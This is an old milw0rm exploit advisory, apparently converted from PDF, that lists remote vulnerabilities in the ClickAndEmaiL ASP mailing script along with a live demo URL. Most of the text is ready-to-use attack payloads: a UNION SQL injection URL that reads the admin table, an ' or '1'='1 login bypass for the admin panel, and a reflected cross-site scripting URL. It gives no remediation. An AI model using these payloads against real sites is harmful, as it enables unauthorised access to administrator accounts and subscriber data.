ClickAndEmaiL SQLXSS Multiple Remote Vulnerabilities.pdf

1 ########################################################################### 2 #−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−AlpHaNiX−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−# 3 ########################################################################### 4 5 #Found By : AlpHaNiX 6 #website : www.offensivetrack.org 7 #contact : AlpHa[AT]HACKER[DOT]BZ 8 9 ########################################################################### 10 11 #script : ClickAndEmaiL 12 #download : null 13 #Demo : http://icash.ch/ClickAndEmailDEMO 14 15 ########################################################################### 16 17 #Exploits : 18 19 −−=[SQL INJECTION]=−− 20 http://icash.ch/ClickAndEmailDEMO/admin_dblayers.asp?action=update&tablename=Subscribers&redir=admin_subscribers.asp& ID=0+union+select+1,2,3,4,5,6,7+from+admin 21 22 23 ########################################################################## 24 25 −−=[AUTH BYPASS]=−− 26 27 http://icash.ch/ClickAndEmailDEMO/admin_main.asp 28 29 USERNAME : ’ or ’1’=’1 30 PASSWORD : ’ or ’1’=’1 31 32 33 ########################################################################## 34 35 −−=[Cross Site Scripting]=−− 36 37 http://icash.ch/ClickAndEmailDEMO/admin_dblayers.asp?action=update&tablename=%22%3E%3Cscript%3Ealert(1);%3C/script%3E 38 39 40 41 #Greetz For My Best Friend ZIGMA 42 43 ########################################################################### 44 45 # milw0rm.com [2008−12−15] Page 1/1 ClickAndEmaiL SQLXSS Multiple Remote Vulnerabilities AlpHaNiX 12/15/2008